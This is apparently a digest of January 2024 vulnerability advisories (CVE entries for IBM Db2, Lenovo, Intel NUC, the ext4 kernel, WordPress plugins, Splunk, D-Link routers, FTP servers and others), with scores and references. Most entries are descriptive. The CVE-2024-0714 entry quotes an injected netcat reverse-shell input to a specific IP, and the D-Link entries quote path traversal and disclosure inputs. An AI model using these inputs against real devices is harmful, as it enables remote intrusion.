Vulnerability : CWE-918


Vulnerability ID : CVE-2023-47746

First published on : 22-01-2024 19:15:08
Last modified on : 22-01-2024 20:28:17

Description :
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272644.

CVE ID : CVE-2023-47746
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/272644 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105505 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47158

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270750.

CVE ID : CVE-2023-47158
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270750 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105496 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47747

First published on : 22-01-2024 20:15:47
Last modified on : 22-01-2024 20:28:17

Description :
IBM DB2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.1, 10.5, and 11.1 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 272646.

CVE ID : CVE-2023-47747
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/272646 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105502 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47141

First published on : 22-01-2024 21:15:09
Last modified on : 22-01-2024 21:15:09

Description :
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow an authenticated user with CONNECT privileges to cause a denial of service using a specially crafted query. IBM X-Force ID: 270264.

CVE ID : CVE-2023-47141
Source : psirt@us.ibm.com
CVSS Score : 5.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/270264 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7105497 | source : psirt@us.ibm.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-47718

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 are vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843.

CVE ID : CVE-2023-47718
Source : psirt@us.ibm.com
CVSS Score : 4.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271843 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107738 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107740 | source : psirt@us.ibm.com

Vulnerability : CWE-352


Source : lenovo.com

Vulnerability ID : CVE-2023-5080

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands.

CVE ID : CVE-2023-5080
Source : psirt@lenovo.com
CVSS Score : 6.8

References :
https://support.lenovo.com/us/en/product_security/LEN-142135 | source : psirt@lenovo.com

Vulnerability : CWE-269


Vulnerability ID : CVE-2023-6044

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges.

CVE ID : CVE-2023-6044
Source : psirt@lenovo.com
CVSS Score : 6.3

References :
https://support.lenovo.com/us/en/product_security/LEN-144736 | source : psirt@lenovo.com

Vulnerability : CWE-290


Vulnerability ID : CVE-2023-6450

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
An incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service.

CVE ID : CVE-2023-6450
Source : psirt@lenovo.com
CVSS Score : 5.5

References :
https://iknow.lenovo.com.cn/detail/419672 | source : psirt@lenovo.com

Vulnerability : CWE-400


Source : intel.com

Vulnerability ID : CVE-2023-28722

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28722
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-92


Vulnerability ID : CVE-2023-29244

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Incorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-29244
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-276


Vulnerability ID : CVE-2023-38541

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Insecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-38541
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-277


Source : redhat.com

Vulnerability ID : CVE-2024-0775

First published on : 22-01-2024 13:15:25
Last modified on : 22-01-2024 14:01:09

Description :
A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free.

CVE ID : CVE-2024-0775
Source : secalert@redhat.com
CVSS Score : 6.7

References :
https://access.redhat.com/security/cve/CVE-2024-0775 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2259414 | source : secalert@redhat.com
https://scm.linefinity.com/common/linux-stable/commit/4c0b4818b1f636bc96359f7817a2d8bab6370162 | source : secalert@redhat.com

Vulnerability : CWE-416


Source : patchstack.com

Vulnerability ID : CVE-2022-45083

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress. This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress: from n/a through 4.3.2.

CVE ID : CVE-2022-45083
Source : audit@patchstack.com
CVSS Score : 6.6

References :
https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-3-2-auth-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2022-47160

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter. This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.

CVE ID : CVE-2022-47160
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/wp-social/wordpress-wp-social-plugin-1-9-0-auth-sensitive-information-disclosure-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2022-45845

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3. This issue affects Smart Slider 3: from n/a through 3.5.1.9.

CVE ID : CVE-2022-45845
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/smart-slider-3/wordpress-smart-slider-3-plugin-3-5-1-9-auth-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Source : github.com

Vulnerability ID : CVE-2024-22420

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension.

CVE ID : CVE-2024-22420
Source : security-advisories@github.com
CVSS Score : 6.5

References :
https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df | source : security-advisories@github.com
https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4 | source : security-advisories@github.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-44395

First published on : 22-01-2024 15:15:08
Last modified on : 22-01-2024 19:10:26

Description :
Autolab is a course management service that enables instructors to offer autograded programming assignments to their students over the Web. Path traversal vulnerabilities were discovered in Autolab's assessment functionality in versions of Autolab prior to 2.12.0, whereby instructors can perform arbitrary file reads. Version 2.12.0 contains a patch. There are no feasible workarounds for this issue.

CVE ID : CVE-2023-44395
Source : security-advisories@github.com
CVSS Score : 4.9

References :
https://github.com/autolab/Autolab/releases/tag/v2.12.0 | source : security-advisories@github.com
https://github.com/autolab/Autolab/security/advisories/GHSA-h8wq-ghfq-5hfx | source : security-advisories@github.com
https://www.stackhawk.com/blog/rails-path-traversal-guide-examples-and-prevention/ | source : security-advisories@github.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2024-23332

First published on : 19-01-2024 23:15:07
Last modified on : 20-01-2024 02:58:09

Description :
The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of an artifact by specifying signature expiry during the signing process. Using shorter signature validity periods, along with processes to periodically re-sign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attacks in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios include 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry.

CVE ID : CVE-2024-23332
Source : security-advisories@github.com
CVSS Score : 4.0

References :
https://github.com/notaryproject/specifications/commit/cdabdd1042de2999c685fa5d422a785ded9c983a | source : security-advisories@github.com
https://github.com/notaryproject/specifications/security/advisories/GHSA-57wx-m636-g3g8 | source : security-advisories@github.com

Vulnerability : CWE-672


Source : wordfence.com

Vulnerability ID : CVE-2024-0679

First published on : 20-01-2024 06:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.

CVE ID : CVE-2024-0679
Source : security@wordfence.com
CVSS Score : 6.5

References :
https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237 | source : security@wordfence.com
https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve | source : security@wordfence.com


Vulnerability ID : CVE-2024-0623

First published on : 20-01-2024 06:15:44
Last modified on : 22-01-2024 14:01:14

Description :
The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE ID : CVE-2024-0623
Source : security@wordfence.com
CVSS Score : 4.3

References :
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve | source : security@wordfence.com


Source : splunk.com

Vulnerability ID : CVE-2024-23675

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections.

CVE ID : CVE-2024-23675
Source : prodsec@splunk.com
CVSS Score : 6.5

References :
https://advisory.splunk.com/advisories/SVD-2024-0105 | source : prodsec@splunk.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-23676

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit.

CVE ID : CVE-2024-23676
Source : prodsec@splunk.com
CVSS Score : 4.6

References :
https://advisory.splunk.com/advisories/SVD-2024-0106 | source : prodsec@splunk.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2024-23677

First published on : 22-01-2024 21:15:10
Last modified on : 22-01-2024 21:15:10

Description :
In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file.

CVE ID : CVE-2024-23677
Source : prodsec@splunk.com
CVSS Score : 4.3

References :
https://advisory.splunk.com/advisories/SVD-2024-0107 | source : prodsec@splunk.com

Vulnerability : CWE-532


Source : vuldb.com

Vulnerability ID : CVE-2024-0714

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0714
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://vuldb.com/?ctiid.251540 | source : cna@vuldb.com
https://vuldb.com/?id.251540 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2024-0730

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.

CVE ID : CVE-2024-0730
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e | source : cna@vuldb.com
https://vuldb.com/?ctiid.251553 | source : cna@vuldb.com
https://vuldb.com/?id.251553 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0733

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556.

CVE ID : CVE-2024-0733
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://note.zhaoj.in/share/3GznRo9vWRJ8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251556 | source : cna@vuldb.com
https://vuldb.com/?id.251556 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0734

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.

CVE ID : CVE-2024-0734
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://note.zhaoj.in/share/vo1KOw3EYmBK | source : cna@vuldb.com
https://vuldb.com/?ctiid.251557 | source : cna@vuldb.com
https://vuldb.com/?id.251557 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0735

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0735
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://blog.csdn.net/DMZNX/article/details/135683738 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251558 | source : cna@vuldb.com
https://vuldb.com/?id.251558 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0738

First published on : 19-01-2024 22:15:07
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, has been found in ???? mldong 1.0. This issue affects the function ExpressionEngine of the file com/mldong/modules/wf/engine/model/DecisionModel.java. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251561 was assigned to this vulnerability.

CVE ID : CVE-2024-0738
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/biantaibao/mldong_RCE/blob/main/RCE.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251561 | source : cna@vuldb.com
https://vuldb.com/?id.251561 | source : cna@vuldb.com

Vulnerability : CWE-94


Vulnerability ID : CVE-2024-0783

First published on : 22-01-2024 18:15:20
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699.

CVE ID : CVE-2024-0783
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/keru6k/Online-Admission-System-RCE-PoC | source : cna@vuldb.com
https://github.com/keru6k/Online-Admission-System-RCE-PoC/blob/main/poc.py | source : cna@vuldb.com
https://vuldb.com/?ctiid.251699 | source : cna@vuldb.com
https://vuldb.com/?id.251699 | source : cna@vuldb.com

Vulnerability : CWE-434


Vulnerability ID : CVE-2024-0784

First published on : 22-01-2024 18:15:20
Last modified on : 22-01-2024 19:10:26

Description :
A vulnerability was found in biantaibao octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700.

CVE ID : CVE-2024-0784
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://github.com/biantaibao/octopus_SQL/blob/main/report.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251700 | source : cna@vuldb.com
https://vuldb.com/?id.251700 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0729

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552.

CVE ID : CVE-2024-0729
Source : cna@vuldb.com
CVSS Score : 5.5

References :
https://github.com/mi2acle/forucmsvuln/blob/master/LFI.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251552 | source : cna@vuldb.com
https://vuldb.com/?id.251552 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0717

First published on : 19-01-2024 16:15:11
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0717
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://github.com/999zzzzz/D-Link | source : cna@vuldb.com
https://vuldb.com/?ctiid.251542 | source : cna@vuldb.com
https://vuldb.com/?id.251542 | source : cna@vuldb.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2024-0723

First published on : 19-01-2024 17:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547.

CVE ID : CVE-2024-0723
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251547 | source : cna@vuldb.com
https://vuldb.com/?id.251547 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0725

First published on : 19-01-2024 18:15:08
Last modified on : 19-01-2024 18:48:55

Description :
A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548.

CVE ID : CVE-2024-0725
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176544/ProSSHD-1.2-20090726-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251548 | source : cna@vuldb.com
https://vuldb.com/?id.251548 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0731

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0731
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://fitoxs.com/vuldb/01-PCMan%20v2.0.7-exploit.txt | source : cna@vuldb.com
https://vuldb.com/?ctiid.251554 | source : cna@vuldb.com
https://vuldb.com/?id.251554 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0732

First published on : 19-01-2024 20:15:13
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.

CVE ID : CVE-2024-0732
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://fitoxs.com/vuldb/02-PCMan%20v2.0.7-exploit.txt | source : cna@vuldb.com
https://vuldb.com/?ctiid.251555 | source : cna@vuldb.com
https://vuldb.com/?id.251555 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0736

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559.

CVE ID : CVE-2024-0736
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://0day.today/exploit/39249 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251559 | source : cna@vuldb.com
https://vuldb.com/?id.251559 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0737

First published on : 19-01-2024 22:15:07
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.

CVE ID : CVE-2024-0737
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://packetstormsecurity.com/files/176553/LightFTP-1.1-Denial-Of-Service.html | source : cna@vuldb.com
https://vuldb.com/?ctiid.251560 | source : cna@vuldb.com
https://vuldb.com/?id.251560 | source : cna@vuldb.com

Vulnerability : CWE-404


Vulnerability ID : CVE-2024-0769

First published on : 21-01-2024 08:15:07
Last modified on : 22-01-2024 14:01:14

Description :
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.

CVE ID : CVE-2024-0769
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://github.com/c2dc/cve-reported/blob/main/CVE-2024-0769/CVE-2024-0769.md | source : cna@vuldb.com
https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10371 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251666 | source : cna@vuldb.com
https://vuldb.com/?id.251666 | source : cna@vuldb.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2024-0771

First published on : 21-01-2024 23:15:44
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0771
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://vuldb.com/?ctiid.251671 | source : cna@vuldb.com
https://vuldb.com/?id.251671 | source : cna@vuldb.com
https://youtu.be/eecN5mC0avU | source : cna@vuldb.com

Vulnerability : CWE-119


Vulnerability ID : CVE-2024-0772

First published on : 22-01-2024 00:15:06
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0772
Source : cna@vuldb.com
CVSS Score : 5.3

References :
https://vuldb.com/?ctiid.251672 | source : cna@vuldb.com
https://vuldb.com/?id.251672 | source : cna@vuldb.com
https://youtu.be/WIeWeuXbkiY | source : cna@vuldb.com

Vulnerability : CWE-119


Vulnerability ID : CVE-2024-0774

First published on : 22-01-2024 01:15:08
Last modified on : 22-01-2024 14:01:09

Description :
A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0774
Source : cna@vuldb.com
CVSS Score : 5.3

References :
